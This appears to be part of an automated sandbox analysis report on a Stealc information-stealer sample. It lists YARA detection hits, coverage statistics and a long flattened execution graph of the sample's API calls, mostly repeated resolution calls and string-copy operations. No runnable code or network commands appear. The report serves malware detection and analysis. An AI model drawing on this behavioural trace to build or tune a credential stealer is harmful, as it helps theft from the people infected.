                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:5.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.4%
                                  Total number of Nodes:1408
                                  Total number of Limit Nodes:28
fb4a60 2 API calls 25533->25534 25535 fb2e82 25534->25535 25536 fb4a60 2 API calls 25535->25536 25537 fb2ea0 25536->25537 25538 fb4a60 2 API calls 25537->25538 25539 fb2eb6 25538->25539 25540 fb4a60 2 API calls 25539->25540 25541 fb2ecb 25540->25541 25542 fb4a60 2 API calls 25541->25542 25543 fb2eec 25542->25543 25544 fb4a60 2 API calls 25543->25544 25545 fb2f01 25544->25545 25546 fb4a60 2 API calls 25545->25546 25547 fb2f19 25546->25547 25548 fb4a60 2 API calls 25547->25548 25549 fb2f3a 25548->25549 25550 fb4a60 2 API calls 25549->25550 25551 fb2f4f 25550->25551 25552 fb4a60 2 API calls 25551->25552 25553 fb2f65 25552->25553 25554 fb4a60 2 API calls 25553->25554 25555 fb2f7b 25554->25555 25556 fb4a60 2 API calls 25555->25556 25557 fb2f91 25556->25557 25558 fb4a60 2 API calls 25557->25558 25559 fb2faa 25558->25559 25560 fb4a60 2 API calls 25559->25560 25561 fb2fc0 25560->25561 25562 fb4a60 2 API calls 25561->25562 25563 fb2fd6 25562->25563 25564 fb4a60 2 API calls 25563->25564 25565 fb2fec 25564->25565 25566 fb4a60 2 API calls 25565->25566 25567 fb3002 25566->25567 25568 fb4a60 2 API calls 25567->25568 25569 fb3018 25568->25569 25570 fb4a60 2 API calls 25569->25570 25571 fb3031 25570->25571 25572 fb4a60 2 API calls 25571->25572 25573 fb3047 25572->25573 25574 fb4a60 2 API calls 25573->25574 25575 fb305d 25574->25575 25576 fb4a60 2 API calls 25575->25576 25577 fb3073 25576->25577 25578 fb4a60 2 API calls 25577->25578 25579 fb3089 25578->25579 25580 fb4a60 2 API calls 25579->25580 25581 fb309f 25580->25581 25582 fb4a60 2 API calls 25581->25582 25583 fb30b8 25582->25583 25584 fb4a60 2 API calls 25583->25584 25585 fb30ce 25584->25585 25586 fb4a60 2 API calls 25585->25586 25587 fb30e4 25586->25587 25588 fb4a60 2 API calls 25587->25588 25589 fb30fa 25588->25589 25590 fb4a60 2 API calls 25589->25590 25591 fb3110 25590->25591 25592 fb4a60 2 API calls 25591->25592 25593 fb3126 25592->25593 25594 fb4a60 2 API calls 25593->25594 25595 fb313f 25594->25595 25596 fb4a60 2 API 
calls 25595->25596 25597 fb3155 25596->25597 25598 fb4a60 2 API calls 25597->25598 25599 fb316b 25598->25599 25600 fb4a60 2 API calls 25599->25600 25601 fb3181 25600->25601 25602 fb4a60 2 API calls 25601->25602 25603 fb3197 25602->25603 25604 fb4a60 2 API calls 25603->25604 25605 fb31ad 25604->25605 25606 fb4a60 2 API calls 25605->25606 25607 fb31c6 25606->25607 25608 fb4a60 2 API calls 25607->25608 25609 fb31dc 25608->25609 25610 fb4a60 2 API calls 25609->25610 25611 fb31f2 25610->25611 25612 fb4a60 2 API calls 25611->25612 25613 fb3208 25612->25613 25614 fb4a60 2 API calls 25613->25614 25615 fb321e 25614->25615 25616 fb4a60 2 API calls 25615->25616 25617 fb3234 25616->25617 25618 fb4a60 2 API calls 25617->25618 25619 fb324d 25618->25619 25620 fb4a60 2 API calls 25619->25620 25621 fb3263 25620->25621 25622 fb4a60 2 API calls 25621->25622 25623 fb3279 25622->25623 25624 fb4a60 2 API calls 25623->25624 25625 fb328f 25624->25625 25626 fb4a60 2 API calls 25625->25626 25627 fb32a5 25626->25627 25628 fb4a60 2 API calls 25627->25628 25629 fb32bb 25628->25629 25630 fb4a60 2 API calls 25629->25630 25631 fb32d4 25630->25631 25632 fb4a60 2 API calls 25631->25632 25633 fb32ea 25632->25633 25634 fb4a60 2 API calls 25633->25634 25635 fb3300 25634->25635 25636 fb4a60 2 API calls 25635->25636 25637 fb3316 25636->25637 25638 fb4a60 2 API calls 25637->25638 25639 fb332c 25638->25639 25640 fb4a60 2 API calls 25639->25640 25641 fb3342 25640->25641 25642 fb4a60 2 API calls 25641->25642 25643 fb335b 25642->25643 25644 fb4a60 2 API calls 25643->25644 25645 fb3371 25644->25645 25646 fb4a60 2 API calls 25645->25646 25647 fb3387 25646->25647 25648 fb4a60 2 API calls 25647->25648 25649 fb339d 25648->25649 25650 fb4a60 2 API calls 25649->25650 25651 fb33b3 25650->25651 25652 fb4a60 2 API calls 25651->25652 25653 fb33c9 25652->25653 25654 fb4a60 2 API calls 25653->25654 25655 fb33e2 25654->25655 25656 fb4a60 2 API calls 25655->25656 25657 fb33f8 25656->25657 25658 fb4a60 2 API calls 
25657->25658 25659 fb340e 25658->25659 25660 fb4a60 2 API calls 25659->25660 25661 fb3424 25660->25661 25662 fb4a60 2 API calls 25661->25662 25663 fb343a 25662->25663 25664 fb4a60 2 API calls 25663->25664 25665 fb3450 25664->25665 25666 fb4a60 2 API calls 25665->25666 25667 fb3469 25666->25667 25668 fb4a60 2 API calls 25667->25668 25669 fb347f 25668->25669 25670 fb4a60 2 API calls 25669->25670 25671 fb3495 25670->25671 25672 fb4a60 2 API calls 25671->25672 25673 fb34ab 25672->25673 25674 fb4a60 2 API calls 25673->25674 25675 fb34c1 25674->25675 25676 fb4a60 2 API calls 25675->25676 25677 fb34d7 25676->25677 25678 fb4a60 2 API calls 25677->25678 25679 fb34f0 25678->25679 25680 fb4a60 2 API calls 25679->25680 25681 fb3506 25680->25681 25682 fb4a60 2 API calls 25681->25682 25683 fb351c 25682->25683 25684 fb4a60 2 API calls 25683->25684 25685 fb3532 25684->25685 25686 fb4a60 2 API calls 25685->25686 25687 fb3548 25686->25687 25688 fb4a60 2 API calls 25687->25688 25689 fb355e 25688->25689 25690 fb4a60 2 API calls 25689->25690 25691 fb3577 25690->25691 25692 fb4a60 2 API calls 25691->25692 25693 fb358d 25692->25693 25694 fb4a60 2 API calls 25693->25694 25695 fb35a3 25694->25695 25696 fb4a60 2 API calls 25695->25696 25697 fb35b9 25696->25697 25698 fb4a60 2 API calls 25697->25698 25699 fb35cf 25698->25699 25700 fb4a60 2 API calls 25699->25700 25701 fb35e5 25700->25701 25702 fb4a60 2 API calls 25701->25702 25703 fb35fe 25702->25703 25704 fb4a60 2 API calls 25703->25704 25705 fb3614 25704->25705 25706 fb4a60 2 API calls 25705->25706 25707 fb362a 25706->25707 25708 fb4a60 2 API calls 25707->25708 25709 fb3640 25708->25709 25710 fb4a60 2 API calls 25709->25710 25711 fb3656 25710->25711 25712 fb4a60 2 API calls 25711->25712 25713 fb366c 25712->25713 25714 fb4a60 2 API calls 25713->25714 25715 fb3685 25714->25715 25716 fb4a60 2 API calls 25715->25716 25717 fb369b 25716->25717 25718 fb4a60 2 API calls 25717->25718 25719 fb36b1 25718->25719 25720 fb4a60 2 API calls 25719->25720 
25721 fb36c7 25720->25721 25722 fb4a60 2 API calls 25721->25722 25723 fb36dd 25722->25723 25724 fb4a60 2 API calls 25723->25724 25725 fb36f3 25724->25725 25726 fb4a60 2 API calls 25725->25726 25727 fb370c 25726->25727 25728 fb4a60 2 API calls 25727->25728 25729 fb3722 25728->25729 25730 fb4a60 2 API calls 25729->25730 25731 fb3738 25730->25731 25732 fb4a60 2 API calls 25731->25732 25733 fb374e 25732->25733 25734 fb4a60 2 API calls 25733->25734 25735 fb3764 25734->25735 25736 fb4a60 2 API calls 25735->25736 25737 fb377a 25736->25737 25738 fb4a60 2 API calls 25737->25738 25739 fb3793 25738->25739 25740 fb4a60 2 API calls 25739->25740 25741 fb37a9 25740->25741 25742 fb4a60 2 API calls 25741->25742 25743 fb37bf 25742->25743 25744 fb4a60 2 API calls 25743->25744 25745 fb37d5 25744->25745 25746 fb4a60 2 API calls 25745->25746 25747 fb37eb 25746->25747 25748 fb4a60 2 API calls 25747->25748 25749 fb3801 25748->25749 25750 fb4a60 2 API calls 25749->25750 25751 fb381a 25750->25751 25752 fb4a60 2 API calls 25751->25752 25753 fb3830 25752->25753 25754 fb4a60 2 API calls 25753->25754 25755 fb3846 25754->25755 25756 fb4a60 2 API calls 25755->25756 25757 fb385c 25756->25757 25758 fb4a60 2 API calls 25757->25758 25759 fb3872 25758->25759 25760 fb4a60 2 API calls 25759->25760 25761 fb3888 25760->25761 25762 fb4a60 2 API calls 25761->25762 25763 fb38a1 25762->25763 25764 fb4a60 2 API calls 25763->25764 25765 fb38b7 25764->25765 25766 fb4a60 2 API calls 25765->25766 25767 fb38cd 25766->25767 25768 fb4a60 2 API calls 25767->25768 25769 fb38e3 25768->25769 25770 fb4a60 2 API calls 25769->25770 25771 fb38f9 25770->25771 25772 fb4a60 2 API calls 25771->25772 25773 fb390f 25772->25773 25774 fb4a60 2 API calls 25773->25774 25775 fb3928 25774->25775 25776 fb4a60 2 API calls 25775->25776 25777 fb393e 25776->25777 25778 fb4a60 2 API calls 25777->25778 25779 fb3954 25778->25779 25780 fb4a60 2 API calls 25779->25780 25781 fb396a 25780->25781 25782 fb4a60 2 API calls 25781->25782 25783 fb3980 
25782->25783 25784 fb4a60 2 API calls 25783->25784 25785 fb3996 25784->25785 25786 fb4a60 2 API calls 25785->25786 25787 fb39af 25786->25787 25788 fb4a60 2 API calls 25787->25788 25789 fb39c5 25788->25789 25790 fb4a60 2 API calls 25789->25790 25791 fb39db 25790->25791 25792 fb4a60 2 API calls 25791->25792 25793 fb39f1 25792->25793 25794 fb4a60 2 API calls 25793->25794 25795 fb3a07 25794->25795 25796 fb4a60 2 API calls 25795->25796 25797 fb3a1d 25796->25797 25798 fb4a60 2 API calls 25797->25798 25799 fb3a36 25798->25799 25800 fb4a60 2 API calls 25799->25800 25801 fb3a4c 25800->25801 25802 fb4a60 2 API calls 25801->25802 25803 fb3a62 25802->25803 25804 fb4a60 2 API calls 25803->25804 25805 fb3a78 25804->25805 25806 fb4a60 2 API calls 25805->25806 25807 fb3a8e 25806->25807 25808 fb4a60 2 API calls 25807->25808 25809 fb3aa4 25808->25809 25810 fb4a60 2 API calls 25809->25810 25811 fb3abd 25810->25811 25812 fb4a60 2 API calls 25811->25812 25813 fb3ad3 25812->25813 25814 fb4a60 2 API calls 25813->25814 25815 fb3ae9 25814->25815 25816 fb4a60 2 API calls 25815->25816 25817 fb3aff 25816->25817 25818 fb4a60 2 API calls 25817->25818 25819 fb3b15 25818->25819 25820 fb4a60 2 API calls 25819->25820 25821 fb3b2b 25820->25821 25822 fb4a60 2 API calls 25821->25822 25823 fb3b44 25822->25823 25824 fb4a60 2 API calls 25823->25824 25825 fb3b5a 25824->25825 25826 fb4a60 2 API calls 25825->25826 25827 fb3b70 25826->25827 25828 fb4a60 2 API calls 25827->25828 25829 fb3b86 25828->25829 25830 fb4a60 2 API calls 25829->25830 25831 fb3b9c 25830->25831 25832 fb4a60 2 API calls 25831->25832 25833 fb3bb2 25832->25833 25834 fb4a60 2 API calls 25833->25834 25835 fb3bcb 25834->25835 25836 fb4a60 2 API calls 25835->25836 25837 fb3be1 25836->25837 25838 fb4a60 2 API calls 25837->25838 25839 fb3bf7 25838->25839 25840 fb4a60 2 API calls 25839->25840 25841 fb3c0d 25840->25841 25842 fb4a60 2 API calls 25841->25842 25843 fb3c23 25842->25843 25844 fb4a60 2 API calls 25843->25844 25845 fb3c39 25844->25845 
25846 fb4a60 2 API calls 25845->25846 25847 fb3c52 25846->25847 25848 fb4a60 2 API calls 25847->25848 25849 fb3c68 25848->25849 25850 fb4a60 2 API calls 25849->25850 25851 fb3c7e 25850->25851 25852 fb4a60 2 API calls 25851->25852 25853 fb3c94 25852->25853 25854 fb4a60 2 API calls 25853->25854 25855 fb3caa 25854->25855 25856 fb4a60 2 API calls 25855->25856 25857 fb3cc0 25856->25857 25858 fb4a60 2 API calls 25857->25858 25859 fb3cd9 25858->25859 25860 fb4a60 2 API calls 25859->25860 25861 fb3cef 25860->25861 25862 fb4a60 2 API calls 25861->25862 25863 fb3d05 25862->25863 25864 fb4a60 2 API calls 25863->25864 25865 fb3d1b 25864->25865 25866 fb4a60 2 API calls 25865->25866 25867 fb3d31 25866->25867 25868 fb4a60 2 API calls 25867->25868 25869 fb3d47 25868->25869 25870 fb4a60 2 API calls 25869->25870 25871 fb3d60 25870->25871 25872 fb4a60 2 API calls 25871->25872 25873 fb3d76 25872->25873 25874 fb4a60 2 API calls 25873->25874 25875 fb3d8c 25874->25875 25876 fb4a60 2 API calls 25875->25876 25877 fb3da2 25876->25877 25878 fb4a60 2 API calls 25877->25878 25879 fb3db8 25878->25879 25880 fb4a60 2 API calls 25879->25880 25881 fb3dce 25880->25881 25882 fb4a60 2 API calls 25881->25882 25883 fb3de7 25882->25883 25884 fb4a60 2 API calls 25883->25884 25885 fb3dfd 25884->25885 25886 fb4a60 2 API calls 25885->25886 25887 fb3e13 25886->25887 25888 fb4a60 2 API calls 25887->25888 25889 fb3e29 25888->25889 25890 fb4a60 2 API calls 25889->25890 25891 fb3e3f 25890->25891 25892 fb4a60 2 API calls 25891->25892 25893 fb3e55 25892->25893 25894 fb4a60 2 API calls 25893->25894 25895 fb3e6e 25894->25895 25896 fb4a60 2 API calls 25895->25896 25897 fb3e84 25896->25897 25898 fb4a60 2 API calls 25897->25898 25899 fb3e9a 25898->25899 25900 fb4a60 2 API calls 25899->25900 25901 fb3eb0 25900->25901 25902 fb4a60 2 API calls 25901->25902 25903 fb3ec6 25902->25903 25904 fb4a60 2 API calls 25903->25904 25905 fb3edc 25904->25905 25906 fb4a60 2 API calls 25905->25906 25907 fb3ef5 25906->25907 25908 fb4a60 2 
API calls 25907->25908 25909 fb3f0b 25908->25909 25910 fb4a60 2 API calls 25909->25910 25911 fb3f21 25910->25911 25912 fb4a60 2 API calls 25911->25912 25913 fb3f37 25912->25913 25914 fb4a60 2 API calls 25913->25914 25915 fb3f4d 25914->25915 25916 fb4a60 2 API calls 25915->25916 25917 fb3f63 25916->25917 25918 fb4a60 2 API calls 25917->25918 25919 fb3f7c 25918->25919 25920 fb4a60 2 API calls 25919->25920 25921 fb3f92 25920->25921 25922 fb4a60 2 API calls 25921->25922 25923 fb3fa8 25922->25923 25924 fb4a60 2 API calls 25923->25924 25925 fb3fbe 25924->25925 25926 fb4a60 2 API calls 25925->25926 25927 fb3fd4 25926->25927 25928 fb4a60 2 API calls 25927->25928 25929 fb3fea 25928->25929 25930 fb4a60 2 API calls 25929->25930 25931 fb4003 25930->25931 25932 fb4a60 2 API calls 25931->25932 25933 fb4019 25932->25933 25934 fb4a60 2 API calls 25933->25934 25935 fb402f 25934->25935 25936 fb4a60 2 API calls 25935->25936 25937 fb4045 25936->25937 25938 fb4a60 2 API calls 25937->25938 25939 fb405b 25938->25939 25940 fb4a60 2 API calls 25939->25940 25941 fb4071 25940->25941 25942 fb4a60 2 API calls 25941->25942 25943 fb408a 25942->25943 25944 fb4a60 2 API calls 25943->25944 25945 fb40a0 25944->25945 25946 fb4a60 2 API calls 25945->25946 25947 fb40b6 25946->25947 25948 fb4a60 2 API calls 25947->25948 25949 fb40cc 25948->25949 25950 fb4a60 2 API calls 25949->25950 25951 fb40e2 25950->25951 25952 fb4a60 2 API calls 25951->25952 25953 fb40f8 25952->25953 25954 fb4a60 2 API calls 25953->25954 25955 fb4111 25954->25955 25956 fb4a60 2 API calls 25955->25956 25957 fb4127 25956->25957 25958 fb4a60 2 API calls 25957->25958 25959 fb413d 25958->25959 25960 fb4a60 2 API calls 25959->25960 25961 fb4153 25960->25961 25962 fb4a60 2 API calls 25961->25962 25963 fb4169 25962->25963 25964 fb4a60 2 API calls 25963->25964 25965 fb417f 25964->25965 25966 fb4a60 2 API calls 25965->25966 25967 fb4198 25966->25967 25968 fb4a60 2 API calls 25967->25968 25969 fb41ae 25968->25969 25970 fb4a60 2 API calls 
25969->25970 25971 fb41c4 25970->25971 25972 fb4a60 2 API calls 25971->25972 25973 fb41da 25972->25973 25974 fb4a60 2 API calls 25973->25974 25975 fb41f0 25974->25975 25976 fb4a60 2 API calls 25975->25976 25977 fb4206 25976->25977 25978 fb4a60 2 API calls 25977->25978 25979 fb421f 25978->25979 25980 fb4a60 2 API calls 25979->25980 25981 fb4235 25980->25981 25982 fb4a60 2 API calls 25981->25982 25983 fb424b 25982->25983 25984 fb4a60 2 API calls 25983->25984 25985 fb4261 25984->25985 25986 fb4a60 2 API calls 25985->25986 25987 fb4277 25986->25987 25988 fb4a60 2 API calls 25987->25988 25989 fb428d 25988->25989 25990 fb4a60 2 API calls 25989->25990 25991 fb42a6 25990->25991 25992 fb4a60 2 API calls 25991->25992 25993 fb42bc 25992->25993 25994 fb4a60 2 API calls 25993->25994 25995 fb42d2 25994->25995 25996 fb4a60 2 API calls 25995->25996 25997 fb42e8 25996->25997 25998 fb4a60 2 API calls 25997->25998 25999 fb42fe 25998->25999 26000 fb4a60 2 API calls 25999->26000 26001 fb4314 26000->26001 26002 fb4a60 2 API calls 26001->26002 26003 fb432d 26002->26003 26004 fb4a60 2 API calls 26003->26004 26005 fb4343 26004->26005 26006 fb4a60 2 API calls 26005->26006 26007 fb4359 26006->26007 26008 fb4a60 2 API calls 26007->26008 26009 fb436f 26008->26009 26010 fb4a60 2 API calls 26009->26010 26011 fb4385 26010->26011 26012 fb4a60 2 API calls 26011->26012 26013 fb439b 26012->26013 26014 fb4a60 2 API calls 26013->26014 26015 fb43b4 26014->26015 26016 fb4a60 2 API calls 26015->26016 26017 fb43ca 26016->26017 26018 fb4a60 2 API calls 26017->26018 26019 fb43e0 26018->26019 26020 fb4a60 2 API calls 26019->26020 26021 fb43f6 26020->26021 26022 fb4a60 2 API calls 26021->26022 26023 fb440c 26022->26023 26024 fb4a60 2 API calls 26023->26024 26025 fb4422 26024->26025 26026 fb4a60 2 API calls 26025->26026 26027 fb443b 26026->26027 26028 fb4a60 2 API calls 26027->26028 26029 fb4451 26028->26029 26030 fb4a60 2 API calls 26029->26030 26031 fb4467 26030->26031 26032 fb4a60 2 API calls 26031->26032 
26033 fb447d 26032->26033 26034 fb4a60 2 API calls 26033->26034 26035 fb4493 26034->26035 26036 fb4a60 2 API calls 26035->26036 26037 fb44a9 26036->26037 26038 fb4a60 2 API calls 26037->26038 26039 fb44c2 26038->26039 26040 fb4a60 2 API calls 26039->26040 26041 fb44d8 26040->26041 26042 fb4a60 2 API calls 26041->26042 26043 fb44ee 26042->26043 26044 fb4a60 2 API calls 26043->26044 26045 fb4504 26044->26045 26046 fb4a60 2 API calls 26045->26046 26047 fb451a 26046->26047 26048 fb4a60 2 API calls 26047->26048 26049 fb4530 26048->26049 26050 fb4a60 2 API calls 26049->26050 26051 fb4549 26050->26051 26052 fb4a60 2 API calls 26051->26052 26053 fb455f 26052->26053 26054 fb4a60 2 API calls 26053->26054 26055 fb4575 26054->26055 26056 fb4a60 2 API calls 26055->26056 26057 fb458b 26056->26057 26058 fb4a60 2 API calls 26057->26058 26059 fb45a1 26058->26059 26060 fb4a60 2 API calls 26059->26060 26061 fb45b7 26060->26061 26062 fb4a60 2 API calls 26061->26062 26063 fb45d0 26062->26063 26064 fb4a60 2 API calls 26063->26064 26065 fb45e6 26064->26065 26066 fb4a60 2 API calls 26065->26066 26067 fb45fc 26066->26067 26068 fb4a60 2 API calls 26067->26068 26069 fb4612 26068->26069 26070 fb4a60 2 API calls 26069->26070 26071 fb4628 26070->26071 26072 fb4a60 2 API calls 26071->26072 26073 fb463e 26072->26073 26074 fb4a60 2 API calls 26073->26074 26075 fb4657 26074->26075 26076 fb4a60 2 API calls 26075->26076 26077 fb466d 26076->26077 26078 fb4a60 2 API calls 26077->26078 26079 fb4683 26078->26079 26080 fb4a60 2 API calls 26079->26080 26081 fb4699 26080->26081 26082 fb4a60 2 API calls 26081->26082 26083 fb46af 26082->26083 26084 fb4a60 2 API calls 26083->26084 26085 fb46c5 26084->26085 26086 fb4a60 2 API calls 26085->26086 26087 fb46de 26086->26087 26088 fb4a60 2 API calls 26087->26088 26089 fb46f4 26088->26089 26090 fb4a60 2 API calls 26089->26090 26091 fb470a 26090->26091 26092 fb4a60 2 API calls 26091->26092 26093 fb4720 26092->26093 26094 fb4a60 2 API calls 26093->26094 26095 fb4736 
26094->26095 26096 fb4a60 2 API calls 26095->26096 26097 fb474c 26096->26097 26098 fb4a60 2 API calls 26097->26098 26099 fb4765 26098->26099 26100 fb4a60 2 API calls 26099->26100 26101 fb477b 26100->26101 26102 fb4a60 2 API calls 26101->26102 26103 fb4791 26102->26103 26104 fb4a60 2 API calls 26103->26104 26105 fb47a7 26104->26105 26106 fb4a60 2 API calls 26105->26106 26107 fb47bd 26106->26107 26108 fb4a60 2 API calls 26107->26108 26109 fb47d3 26108->26109 26110 fb4a60 2 API calls 26109->26110 26111 fb47ec 26110->26111 26112 fb4a60 2 API calls 26111->26112 26113 fb4802 26112->26113 26114 fb4a60 2 API calls 26113->26114 26115 fb4818 26114->26115 26116 fb4a60 2 API calls 26115->26116 26117 fb482e 26116->26117 26118 fb4a60 2 API calls 26117->26118 26119 fb4844 26118->26119 26120 fb4a60 2 API calls 26119->26120 26121 fb485a 26120->26121 26122 fb4a60 2 API calls 26121->26122 26123 fb4873 26122->26123 26124 fb4a60 2 API calls 26123->26124 26125 fb4889 26124->26125 26126 fb4a60 2 API calls 26125->26126 26127 fb489f 26126->26127 26128 fb4a60 2 API calls 26127->26128 26129 fb48b5 26128->26129 26130 fb4a60 2 API calls 26129->26130 26131 fb48cb 26130->26131 26132 fb4a60 2 API calls 26131->26132 26133 fb48e1 26132->26133 26134 fb4a60 2 API calls 26133->26134 26135 fb48fa 26134->26135 26136 fb4a60 2 API calls 26135->26136 26137 fb4910 26136->26137 26138 fb4a60 2 API calls 26137->26138 26139 fb4926 26138->26139 26140 fb4a60 2 API calls 26139->26140 26141 fb493c 26140->26141 26142 fb4a60 2 API calls 26141->26142 26143 fb4952 26142->26143 26144 fb4a60 2 API calls 26143->26144 26145 fb4968 26144->26145 26146 fb4a60 2 API calls 26145->26146 26147 fb4981 26146->26147 26148 fb4a60 2 API calls 26147->26148 26149 fb4997 26148->26149 26150 fb4a60 2 API calls 26149->26150 26151 fb49ad 26150->26151 26152 fb4a60 2 API calls 26151->26152 26153 fb49c3 26152->26153 26154 fb4a60 2 API calls 26153->26154 26155 fb49d9 26154->26155 26156 fb4a60 2 API calls 26155->26156 26157 fb49ef 26156->26157 
26158 fb4a60 2 API calls 26157->26158 26159 fb4a08 26158->26159 26160 fb4a60 2 API calls 26159->26160 26161 fb4a1e 26160->26161 26162 fb4a60 2 API calls 26161->26162 26163 fb4a34 26162->26163 26164 fb4a60 2 API calls 26163->26164 26165 fb4a4a 26164->26165 26166 fd66e0 26165->26166 26167 fd66ed 43 API calls 26166->26167 26168 fd6afe 8 API calls 26166->26168 26167->26168 26169 fd6c08 26168->26169 26170 fd6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26168->26170 26171 fd6c15 8 API calls 26169->26171 26172 fd6cd2 26169->26172 26170->26169 26171->26172 26173 fd6d4f 26172->26173 26174 fd6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26172->26174 26175 fd6d5c 6 API calls 26173->26175 26176 fd6de9 26173->26176 26174->26173 26175->26176 26177 fd6df6 12 API calls 26176->26177 26178 fd6f10 26176->26178 26177->26178 26179 fd6f8d 26178->26179 26180 fd6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26178->26180 26181 fd6f96 GetProcAddress GetProcAddress 26179->26181 26182 fd6fc1 26179->26182 26180->26179 26181->26182 26183 fd6fca GetProcAddress GetProcAddress 26182->26183 26184 fd6ff5 26182->26184 26183->26184 26185 fd70ed 26184->26185 26186 fd7002 10 API calls 26184->26186 26187 fd70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26185->26187 26188 fd7152 26185->26188 26186->26185 26187->26188 26189 fd716e 26188->26189 26190 fd715b GetProcAddress 26188->26190 26191 fd7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26189->26191 26192 fd051f 26189->26192 26190->26189 26191->26192 26193 fb1530 26192->26193 26502 fb1610 26193->26502 26195 fb153b 26196 fb1555 lstrcpy 26195->26196 26197 fb155d 26195->26197 26196->26197 26198 fb1577 lstrcpy 26197->26198 26199 fb157f 26197->26199 26198->26199 26200 fb1599 lstrcpy 26199->26200 26201 fb15a1 26199->26201 26200->26201 26202 fb1605 26201->26202 26203 fb15fd lstrcpy 26201->26203 26204 fcf1b0 lstrlen 26202->26204 
26203->26202 26205 fcf1e4 26204->26205 26206 fcf1eb lstrcpy 26205->26206 26207 fcf1f7 lstrlen 26205->26207 26206->26207 26208 fcf208 26207->26208 26209 fcf20f lstrcpy 26208->26209 26210 fcf21b lstrlen 26208->26210 26209->26210 26211 fcf22c 26210->26211 26212 fcf233 lstrcpy 26211->26212 26213 fcf23f 26211->26213 26212->26213 26214 fcf258 lstrcpy 26213->26214 26215 fcf264 26213->26215 26214->26215 26216 fcf286 lstrcpy 26215->26216 26217 fcf292 26215->26217 26216->26217 26218 fcf2ba lstrcpy 26217->26218 26219 fcf2c6 26217->26219 26218->26219 26220 fcf2ea lstrcpy 26219->26220 26269 fcf300 26219->26269 26220->26269 26221 fcf30c lstrlen 26221->26269 26222 fcf4b9 lstrcpy 26222->26269 26223 fcf3a1 lstrcpy 26223->26269 26224 fcf3c5 lstrcpy 26224->26269 26225 fcf4e8 lstrcpy 26285 fcf4f0 26225->26285 26226 fb1530 8 API calls 26226->26285 26227 fcf479 lstrcpy 26227->26269 26228 fcf70f StrCmpCA 26234 fcfe8e 26228->26234 26228->26269 26229 fcf616 StrCmpCA 26229->26228 26229->26285 26230 fcf59c lstrcpy 26230->26285 26231 fcfa29 StrCmpCA 26240 fcfe2b 26231->26240 26231->26269 26232 fcf73e lstrlen 26232->26269 26233 fcfead lstrlen 26247 fcfec7 26233->26247 26234->26233 26239 fcfea5 lstrcpy 26234->26239 26235 fcfd4d StrCmpCA 26237 fcfd60 Sleep 26235->26237 26244 fcfd75 26235->26244 26236 fcfa58 lstrlen 26236->26269 26237->26269 26238 fcf64a lstrcpy 26238->26285 26239->26233 26241 fcfe4a lstrlen 26240->26241 26242 fcfe42 lstrcpy 26240->26242 26253 fcfe64 26241->26253 26242->26241 26243 fcf89e lstrcpy 26243->26269 26245 fcfd94 lstrlen 26244->26245 26249 fcfd8c lstrcpy 26244->26249 26255 fcfdae 26245->26255 26246 fcf76f lstrcpy 26246->26269 26248 fcfee7 lstrlen 26247->26248 26251 fcfedf lstrcpy 26247->26251 26260 fcff01 26248->26260 26249->26245 26250 fcfbb8 lstrcpy 26250->26269 26251->26248 26252 fcfa89 lstrcpy 26252->26269 26254 fcfdce lstrlen 26253->26254 26256 fcfe7c lstrcpy 26253->26256 26271 fcfde8 26254->26271 26255->26254 26266 fcfdc6 lstrcpy 26255->26266 26256->26254 26257 
fcf791 lstrcpy 26257->26269 26259 fcf8cd lstrcpy 26259->26285 26261 fcff21 26260->26261 26262 fcff19 lstrcpy 26260->26262 26263 fb1610 4 API calls 26261->26263 26262->26261 26288 fcfe13 26263->26288 26264 fcfaab lstrcpy 26264->26269 26265 fcf698 lstrcpy 26265->26285 26266->26254 26267 fb1530 8 API calls 26267->26269 26268 fcfbe7 lstrcpy 26268->26285 26269->26221 26269->26222 26269->26223 26269->26224 26269->26225 26269->26227 26269->26228 26269->26231 26269->26232 26269->26235 26269->26236 26269->26243 26269->26246 26269->26250 26269->26252 26269->26257 26269->26259 26269->26264 26269->26267 26269->26268 26270 fcee90 28 API calls 26269->26270 26276 fcf7e2 lstrcpy 26269->26276 26279 fcfafc lstrcpy 26269->26279 26269->26285 26270->26269 26272 fcfe08 26271->26272 26274 fcfe00 lstrcpy 26271->26274 26275 fb1610 4 API calls 26272->26275 26273 fcefb0 35 API calls 26273->26285 26274->26272 26275->26288 26276->26269 26277 fcf924 lstrcpy 26277->26285 26278 fcf99e StrCmpCA 26278->26231 26278->26285 26279->26269 26280 fcfcb8 StrCmpCA 26280->26235 26280->26285 26281 fcfc3e lstrcpy 26281->26285 26282 fcf9cb lstrcpy 26282->26285 26283 fcfce9 lstrcpy 26283->26285 26284 fcee90 28 API calls 26284->26285 26285->26226 26285->26229 26285->26230 26285->26231 26285->26235 26285->26238 26285->26265 26285->26269 26285->26273 26285->26277 26285->26278 26285->26280 26285->26281 26285->26282 26285->26283 26285->26284 26286 fcfa19 lstrcpy 26285->26286 26287 fcfd3a lstrcpy 26285->26287 26286->26285 26287->26285 26288->25312 26290 fd278c GetVolumeInformationA 26289->26290 26291 fd2785 26289->26291 26292 fd27ec GetProcessHeap RtlAllocateHeap 26290->26292 26291->26290 26294 fd2826 wsprintfA 26292->26294 26295 fd2822 26292->26295 26294->26295 26512 fd71e0 26295->26512 26299 fb4c70 26298->26299 26300 fb4c85 26299->26300 26301 fb4c7d lstrcpy 26299->26301 26516 fb4bc0 26300->26516 26301->26300 26303 fb4c90 26304 fb4ccc lstrcpy 26303->26304 26305 fb4cd8 26303->26305 26304->26305 26306 fb4cff lstrcpy 
